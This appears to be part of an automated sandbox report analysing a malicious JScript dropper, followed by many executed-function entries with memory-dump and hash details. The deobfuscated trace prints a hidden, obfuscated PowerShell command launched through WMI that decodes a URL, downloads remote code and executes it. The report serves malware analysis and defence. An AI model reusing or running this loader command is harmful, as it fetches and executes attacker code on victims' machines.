                                                                                                                                                                                                                                                                                                                                                                                                      • Afsga3rvz(377,"yUU4") ➔ "length"
                                                                                                                                                                                                                                                                                                                                                                                                      • Afsga3rvz(376,"cQvj") ➔ "fromCharCode"
                                                                                                                                                                                                                                                                                                                                                                                                      • Afsga3rvz(377,"yUU4") ➔ "length"
                                                                                                                                                                                                                                                                                                                                                                                                      • Afsga3rvz(376,"cQvj") ➔ "fromCharCode"
                                                                                                                                                                                                                                                                                                                                                                                                      • Afsga3rvz(377,"yUU4") ➔ "length"
                                                                                                                                                                                                                                                                                                                                                                                                      • Afsga3rvz(376,"cQvj") ➔ "fromCharCode"
                                                                                                                                                                                                                                                                                                                                                                                                      • Afsga3rvz(377,"yUU4") ➔ "length"
                                                                                                                                                                                                                                                                                                                                                                                                      • Afsga3rvz(376,"cQvj") ➔ "fromCharCode"
                                                                                                                                                                                                                                                                                                                                                                                                      • Afsga3rvz(377,"yUU4") ➔ "length"
                                                                                                                                                                                                                                                                                                                                                                                                      • Afsga3rvz(376,"cQvj") ➔ "fromCharCode"
                                                                                                                                                                                                                                                                                                                                                                                                      • Afsga3rvz(377,"yUU4") ➔ "length"
                                                                                                                                                                                                                                                                                                                                                                                                      188
                                                                                                                                                                                                                                                                                                                                                                                                      }
                                                                                                                                                                                                                                                                                                                                                                                                        189
                                                                                                                                                                                                                                                                                                                                                                                                        var pgszrfkawubjvode = [ whichburton0wallsand ( '0x1c6', '8*oE' ), whichburton0thispopular ( '0x1c7', 'bA0z' ), whichburton0theysought ( '0x1c8', '2wt&' ), XtheythatMelvilleMelvillecasethe, whichburton0theysought ( '0x1c9', 'huKX' ) ];
                                                                                                                                                                                                                                                                                                                                                                                                        • whichburton0theirreign("0x1c6","8*oE") ➔ "winmgmts:root\cimv2:Win32_Process"
                                                                                                                                                                                                                                                                                                                                                                                                        • whichburton0theirreign("0x1c7","bA0z") ➔ "less powershel"
                                                                                                                                                                                                                                                                                                                                                                                                        • whichburton0theirreign("0x1c8","2wt&") ➔ "conhost --head"
                                                                                                                                                                                                                                                                                                                                                                                                        • whichburton0theirreign("0x1c9","huKX") ➔ "time"
                                                                                                                                                                                                                                                                                                                                                                                                        190
                                                                                                                                                                                                                                                                                                                                                                                                        function whichburton0intohave() {
                                                                                                                                                                                                                                                                                                                                                                                                        • whichburton0intohave() ➔ WRb5WRfAcdtdVfDxWRL2W5FdT8o8xv3cQHldNWFdMmkNxSoGouZdSmo2AsZdGXhcVG,W5TzW5KSeSoNvaikW68wWRFdOCkJ,WOOifMGIW6pcQSo0W5SFEmoqW7tdSq,W6tcUeLl
                                                                                                                                                                                                                                                                                                                                                                                                        191
                                                                                                                                                                                                                                                                                                                                                                                                        var thethan = [ 'WRb5WRfAcdtdVfDxWRL2W5FdT8o8xv3cQHldNWFdMmkNxSoGouZdSmo2AsZdGXhcVG', 'W5TzW5KSeSoNvaikW68wWRFdOCkJ', 'WOOifMGIW6pcQSo0W5SFEmoqW7tdSq', 'W6tcUeLl' ];
                                                                                                                                                                                                                                                                                                                                                                                                          192
                                                                                                                                                                                                                                                                                                                                                                                                          whichburton0intohave =
                                                                                                                                                                                                                                                                                                                                                                                                            193
                                                                                                                                                                                                                                                                                                                                                                                                            function () {
                                                                                                                                                                                                                                                                                                                                                                                                            • whichburton0intohave() ➔ WRb5WRfAcdtdVfDxWRL2W5FdT8o8xv3cQHldNWFdMmkNxSoGouZdSmo2AsZdGXhcVG,W5TzW5KSeSoNvaikW68wWRFdOCkJ,WOOifMGIW6pcQSo0W5SFEmoqW7tdSq,W6tcUeLl
                                                                                                                                                                                                                                                                                                                                                                                                            • whichburton0intohave() ➔ WRb5WRfAcdtdVfDxWRL2W5FdT8o8xv3cQHldNWFdMmkNxSoGouZdSmo2AsZdGXhcVG,W5TzW5KSeSoNvaikW68wWRFdOCkJ,WOOifMGIW6pcQSo0W5SFEmoqW7tdSq,W6tcUeLl
                                                                                                                                                                                                                                                                                                                                                                                                            • whichburton0intohave() ➔ WRb5WRfAcdtdVfDxWRL2W5FdT8o8xv3cQHldNWFdMmkNxSoGouZdSmo2AsZdGXhcVG,W5TzW5KSeSoNvaikW68wWRFdOCkJ,WOOifMGIW6pcQSo0W5SFEmoqW7tdSq,W6tcUeLl
                                                                                                                                                                                                                                                                                                                                                                                                            • whichburton0intohave() ➔ WRb5WRfAcdtdVfDxWRL2W5FdT8o8xv3cQHldNWFdMmkNxSoGouZdSmo2AsZdGXhcVG,W5TzW5KSeSoNvaikW68wWRFdOCkJ,WOOifMGIW6pcQSo0W5SFEmoqW7tdSq,W6tcUeLl
                                                                                                                                                                                                                                                                                                                                                                                                            194
                                                                                                                                                                                                                                                                                                                                                                                                            return thethan;
                                                                                                                                                                                                                                                                                                                                                                                                              195
                                                                                                                                                                                                                                                                                                                                                                                                              };
                                                                                                                                                                                                                                                                                                                                                                                                                196
                                                                                                                                                                                                                                                                                                                                                                                                                return whichburton0intohave ( );
                                                                                                                                                                                                                                                                                                                                                                                                                • whichburton0intohave() ➔ WRb5WRfAcdtdVfDxWRL2W5FdT8o8xv3cQHldNWFdMmkNxSoGouZdSmo2AsZdGXhcVG,W5TzW5KSeSoNvaikW68wWRFdOCkJ,WOOifMGIW6pcQSo0W5SFEmoqW7tdSq,W6tcUeLl
                                                                                                                                                                                                                                                                                                                                                                                                                197
                                                                                                                                                                                                                                                                                                                                                                                                                }
                                                                                                                                                                                                                                                                                                                                                                                                                  198
                                                                                                                                                                                                                                                                                                                                                                                                                  var mqsxgrjytzeapbkf = "";
                                                                                                                                                                                                                                                                                                                                                                                                                    199
                                                                                                                                                                                                                                                                                                                                                                                                                    var igxlurwzmfybocaq = GetObject ( pgszrfkawubjvode[0] );
                                                                                                                                                                                                                                                                                                                                                                                                                    • GetObject("winmgmts:root\cimv2:Win32_Process") ➔
                                                                                                                                                                                                                                                                                                                                                                                                                    200
                                                                                                                                                                                                                                                                                                                                                                                                                    var array = pgszrfkawubjvode;
                                                                                                                                                                                                                                                                                                                                                                                                                      201
                                                                                                                                                                                                                                                                                                                                                                                                                      var arrayLength = array.length;
                                                                                                                                                                                                                                                                                                                                                                                                                        202
                                                                                                                                                                                                                                                                                                                                                                                                                        if ( 7916 < 0 || 7916 >= arrayLength )
                                                                                                                                                                                                                                                                                                                                                                                                                          203
                                                                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                                                                            204
                                                                                                                                                                                                                                                                                                                                                                                                                            var yurmjdfqbvhistzn = 0;
                                                                                                                                                                                                                                                                                                                                                                                                                              205
                                                                                                                                                                                                                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                                                                                                                                                                                                                206
                                                                                                                                                                                                                                                                                                                                                                                                                                for ( var reportnum = 0 ; reportnum < 7916 ; reportnum ++ )
                                                                                                                                                                                                                                                                                                                                                                                                                                  207
                                                                                                                                                                                                                                                                                                                                                                                                                                  {
                                                                                                                                                                                                                                                                                                                                                                                                                                    208
                                                                                                                                                                                                                                                                                                                                                                                                                                    var rcuxnolvpgehdwaz = array[7916 - reportnum + 2564 - 2563];
                                                                                                                                                                                                                                                                                                                                                                                                                                      209
                                                                                                                                                                                                                                                                                                                                                                                                                                      var xymtphsnjwzqakio = array[7916 - reportnum];
                                                                                                                                                                                                                                                                                                                                                                                                                                        210
                                                                                                                                                                                                                                                                                                                                                                                                                                        var cdlzakgwvbnhouqy = array[7916 - reportnum + 2564 - 2562];
                                                                                                                                                                                                                                                                                                                                                                                                                                          211
                                                                                                                                                                                                                                                                                                                                                                                                                                          yurmjdfqbvhistzn = rcuxnolvpgehdwaz + xymtphsnjwzqakio + cdlzakgwvbnhouqy;
                                                                                                                                                                                                                                                                                                                                                                                                                                            212
                                                                                                                                                                                                                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                                                                                                                                                                                                                              213
                                                                                                                                                                                                                                                                                                                                                                                                                                              mqsxgrjytzeapbkf = yurmjdfqbvhistzn;
                                                                                                                                                                                                                                                                                                                                                                                                                                                214
                                                                                                                                                                                                                                                                                                                                                                                                                                                igxlurwzmfybocaq.Create ( pgszrfkawubjvode[8427 - 7321 + 123 - 112 + 1943 - 1928 + 455 - 451 + 1086 - 1087] );
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Create(undefined) ➔ 21
                                                                                                                                                                                                                                                                                                                                                                                                                                                215
                                                                                                                                                                                                                                                                                                                                                                                                                                                igxlurwzmfybocaq.Create ( pgszrfkawubjvode[4555 + 4554] );
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Create(undefined) ➔ 21
                                                                                                                                                                                                                                                                                                                                                                                                                                                216
                                                                                                                                                                                                                                                                                                                                                                                                                                                igxlurwzmfybocaq.Create ( mqsxgrjytzeapbkf );
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Create("conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)") ➔ 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD3430BD16 Relevance: .5, Instructions: 470COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3a66d0e39eb50c5ae34934553f9f9a666381d2c1d767eedd2cb2b665c64f8e00
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 135eebc9f1378740c9de34526005fa80fa85f8733b133dcab53c22ab980df09f
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a66d0e39eb50c5ae34934553f9f9a666381d2c1d767eedd2cb2b665c64f8e00
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13F1A630608A8E8FEBA8EF28D8557E977D1FF55310F04426EE84EC7291DB789945CB81
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD3430CAC2 Relevance: .5, Instructions: 457COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9c5dc524e22d439b3674a2a4dc241cf6a08ace59e94ffa4740c2497268296fe5
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ce38ba3218b96386c9e6c66d094a3b172411f6110c6dd21d15ed3e3b21c2737a
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c5dc524e22d439b3674a2a4dc241cf6a08ace59e94ffa4740c2497268296fe5
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8E1B730608A8D4FEBA8EF28C8A57E97BD1EF55311F14436ED84EC7291DB78A8458781
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD345B0D1D Relevance: .9, Instructions: 918COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2536652426.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd345b0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f7af143baa3770452e714de7f3d57c7f72a581cfd2ac99fb88f68e72ef1592f6
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6375057cdcdae7b6abcbe34e6a962da2a454ffa6b3b6b36b8b5c0391f2a10869
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7af143baa3770452e714de7f3d57c7f72a581cfd2ac99fb88f68e72ef1592f6
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A62C332E0DA894FDBA6EB2888A5A6877E1FF56340F5840BDD04DD7293DE29EC45C740
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD343C1706 Relevance: .7, Instructions: 660COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2526938988.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd343c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 56ac5f11eb9b5bb76528395da1e31017c70f0022ff085ac10dfe84e4be97ab6d
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b6b14ffcc3e49b1b165b6f26a52ede319cdae81b6c332bcce616e8307dd437d3
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56ac5f11eb9b5bb76528395da1e31017c70f0022ff085ac10dfe84e4be97ab6d
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34223672A4DB894FEBA5EB2888A56647BE1EF57300F0800BFD09DC7193DA39AC45D741
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD342F6601 Relevance: .6, Instructions: 603COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 03d2558c1cef343ec128be8bf1184e81b347cadd15314121f3959a235c4fb505
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b07f67c1c0b1e420f308b7eb4c8c4758cc6c6dbfb7ba9b937aa66d3bbdee4009
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03d2558c1cef343ec128be8bf1184e81b347cadd15314121f3959a235c4fb505
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC120831A18A498FDB98DF5CC495AA9B7F1FF99300F54016ED04DD7296CA39EC42CB81
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD343C4E85 Relevance: .4, Instructions: 442COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2526938988.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd343c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 578adae44c0a8dd06fac45e28c75abae22fef36bc4006e8e439750c44ed45fd4
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3a182db14e4a2ac61033a9f2fb6fab7d999b22bcbef50c57b5518a832d372367
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 578adae44c0a8dd06fac45e28c75abae22fef36bc4006e8e439750c44ed45fd4
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BD15832A4EA991FEBA5BB6848A55B97BE1EF17310B0801BFD15DC71D3DA2CAC04C351
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD3430C6D6 Relevance: .3, Instructions: 330COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4c7f1f24a2e962f2d2c74896a37209c1a2c815c125db723e653d699c49d1e767
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e5af85d1aae34342ca6a7b8d262d418d8d08d2bf19a6e9775392af9140c2663e
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c7f1f24a2e962f2d2c74896a37209c1a2c815c125db723e653d699c49d1e767
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4EB1B93060CA4D4FEB69EF28D8557E93BE1FF55310F14426EE84EC7292CA789945CB82
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD345D1995 Relevance: .3, Instructions: 321COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2536987965.00007FFD345D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345D0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd345d0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4c7b2b04e97dbf20dcdca4ecf0b5f4696292293a0fbad2556c22c17ae8bf6b39
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6be2278bbe711db9cd3b02c8eb83b076fa84c006e1f908cf28fccfddf8de0ace
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c7b2b04e97dbf20dcdca4ecf0b5f4696292293a0fbad2556c22c17ae8bf6b39
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9491E632F0EAC90FE7AA972C54A55B57BD2EF87310B1802BAD54DC7193DD19AC428381
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD343C1391 Relevance: .2, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2526938988.00007FFD343C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd343c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b4a86ffdd72360e3c8450757cba77e47b2be3450f576173d6dfe276c8bb28fcc
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4e2cb0d3647fd0eb2e00f0ef219b3e626799ded136912ba2309757719f7ab6bc
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4a86ffdd72360e3c8450757cba77e47b2be3450f576173d6dfe276c8bb28fcc
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2510652B4EBC50FE7A6AB2C18B15B43BE1DF57250B1801FBD199C71D3D81DAC06A741
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD34306645 Relevance: .2, Instructions: 179COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e1275eeb742fce828ef879e9ee512577b3249254504d529759f6bf8ad16a0b15
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e2ca5e5aa2018fceedceb57d14295f74eef57bc30ed081469454df23f75d3220
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1275eeb742fce828ef879e9ee512577b3249254504d529759f6bf8ad16a0b15
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1051097190DBC84FEB19AB5C586A1E97FF0EF56310F0842AFD489C71A3DA386805C782
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD3430669F Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2525338036.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd342f0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 574b233b72ce39abb94bda9aa08d06e64b0806abf5716c449c4416dacb6af97c
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 414850aeb30d4bcbc005f8176850cf0ba6177ded665c136cff08a27e79fd37f3
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 574b233b72ce39abb94bda9aa08d06e64b0806abf5716c449c4416dacb6af97c
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54310D71A1CF4C4FDB189B4C98466B97BE0FB98320F00422FE40DD32A1DA75A8558BC2
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD341DE540 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2523701505.00007FFD341DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341DD000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd341dd000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6789e2d748ec263de7dce489019dae829ea70c4b0deadbe25774b3ce147bdb41
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ca36464dee284cb6bedcc2d0b95f55a8ebb0148927f3ae29628318a09f66f3d6
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6789e2d748ec263de7dce489019dae829ea70c4b0deadbe25774b3ce147bdb41
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C141287190EFC44FE7568B289895A623FF0EF53321F1906DFD088CB1A3D629A845C792
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Function 00007FFD345D19E1 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2536987965.00007FFD345D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345D0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
